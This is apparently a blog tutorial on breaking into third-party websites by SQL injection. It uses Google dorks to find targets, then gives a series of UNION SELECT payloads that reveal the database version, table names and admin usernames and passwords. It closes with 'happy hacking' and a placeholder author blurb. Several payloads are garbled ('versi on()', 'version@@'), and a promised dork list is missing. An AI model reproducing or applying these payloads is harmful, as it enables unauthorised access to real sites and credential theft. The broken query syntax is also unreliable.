A injecting sql queries into another database or using queries to get auth bypass as an admin.
part 1 : Basic sql injection
Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
so this database has 4 columns because we got an error on 5
on some databases there is 2 columns and on some 200 it varies
so once we have the column number.
we try the union function
union select 1,2,3,4-- "or whatever number of columns are in the database"
if you see some numbers like 1 2 3 4 on the screen or the column names
it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db
so now we need to info about the db
so lets say the numbers 2 and 4 showed up on the screen
so i will use my query on 2
union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),versi on()),3,4--
the db type and version will pop up on the screen
if the db version is 4 or lower then to extract the password you will need these queries
UNION SELECT 1,concat(table_name,CHAR(58),column_name,CHAR(58), table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
this should display the table containing the admin username and password
but if not then you will have to guess the table
so once you have your table "or not"
UNION SELECT 1,password,3,4 FROM admintablename--
where it says admintablename type the table you found with concat(table_name,CHAR(58),column_name,CHAR(58),ta ble_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
then once u have the right table name you should get the administrator password
then just do the same thing but type username instead of password
sometimes the password is hashed and you need to crack it.
then see if you can get the admin panel if you cant then try the admin panel finder script here
now if the database is version 5 or up
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
and that will display a list of all the tables
once you have your table name
type the same thing as 4
UNION SELECT 1,password,3,4 FROM admintable--
then the same with username
but now if it doesnt work far all those things
just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing
just play around with those
but sometimes we also need to use the version() or version@@
so sometimes UNION SELECT version (),password,3,4 FROM admintable--
or UNION SELECT version @@,password,3,4 FROM admintable--
well that about wraps up my sql injection tutorial.
Cheers happy hacking!!!!
About the Author
Author & Editor
Has laoreet percipitur ad. Vide interesset in mei, no his legimus verterem. Et nostrum imperdiet appellantur usu, mnesarchum referrentur id vim.